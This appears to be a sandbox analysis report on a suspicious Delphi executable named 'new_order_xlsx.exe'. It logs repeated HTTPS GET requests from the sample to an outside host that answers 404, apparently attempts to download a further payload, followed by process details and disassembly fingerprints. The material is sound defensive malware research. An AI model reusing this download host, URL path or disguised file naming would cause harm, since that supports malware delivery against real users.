                    2023-09-04 14:36:29 UTC3INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    3192.168.2.449724185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:36:39 UTC3OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:36:39 UTC4INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:36:39 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:36:39 UTC4INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    4192.168.2.449725185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:36:49 UTC5OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:36:49 UTC5INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:36:49 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:36:49 UTC5INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    5192.168.2.449726185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:36:59 UTC6OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:36:59 UTC6INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:36:59 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:36:59 UTC7INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    6192.168.2.449728185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:37:09 UTC7OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:37:09 UTC7INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:37:09 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:37:09 UTC8INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    7192.168.2.449729185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:37:19 UTC8OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:37:19 UTC9INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:37:19 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:37:19 UTC9INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    8192.168.2.449730185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:37:30 UTC10OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:37:30 UTC10INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:37:30 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:37:30 UTC10INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    9192.168.2.449731185.181.116.217443C:\Users\user\Desktop\new_order_xlsx.exe
                    TimestampkBytes transferredDirectionData
                    2023-09-04 14:37:39 UTC11OUTGET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: balkancelikdovme.com
                    2023-09-04 14:37:39 UTC11INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 708
                    date: Mon, 04 Sep 2023 14:37:39 GMT
                    vary: User-Agent
                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                    2023-09-04 14:37:39 UTC12INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    System Behavior

                    General

                    Target ID:0
                    Start time:16:35:55
                    Start date:04/09/2023
                    Path:C:\Users\user\Desktop\new_order_xlsx.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\new_order_xlsx.exe
                    Imagebase:0x400000
                    File size:1'516'544 bytes
                    MD5 hash:EF6025979E7E27041EF72650FDBE8630
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:Borland Delphi
                    Reputation:low
                    Has exited:false

                    Disassembly

                    Reset < >

                      Non-executed Functions

                      Function 0355C194 Relevance: 7.8, Strings: 6, Instructions: 254COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000003.227119235.000000000355C000.00000004.00001000.00020000.00000000.sdmp, Offset: 0355C000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_3_355c000_new_order_xlsx.jbxd
                      Similarity
                      • API ID:
                      • String ID: $0)@$7$<)@$D)@$L)@
                      • API String ID: 0-3088242726
                      • Opcode ID: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
                      • Instruction ID: fc4555975779f862dffc0225d616a22cefc8f69ae7f3395a3602c24e43f71d74
                      • Opcode Fuzzy Hash: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
                      • Instruction Fuzzy Hash: 04A1E730B043988BDF21DA6CD894BA8B7F4FB49710F1440F6F949AB2A1CB75A9C5CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0355C192 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000003.227119235.000000000355C000.00000004.00001000.00020000.00000000.sdmp, Offset: 0355C000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_3_355c000_new_order_xlsx.jbxd
                      Similarity
                      • API ID:
                      • String ID: $0)@$7$L)@
                      • API String ID: 0-3436765255
                      • Opcode ID: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
                      • Instruction ID: d2b319768b8a54072f8aa7bae45281ae73cdc3f0866a455266091155472b3a84
                      • Opcode Fuzzy Hash: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
                      • Instruction Fuzzy Hash: C271D330B043988BDF21DB2CD894BE8B7F4FB49300F1440E6E949EB291DBB56985CB51
                      Uniqueness

                      Uniqueness Score: -1.00%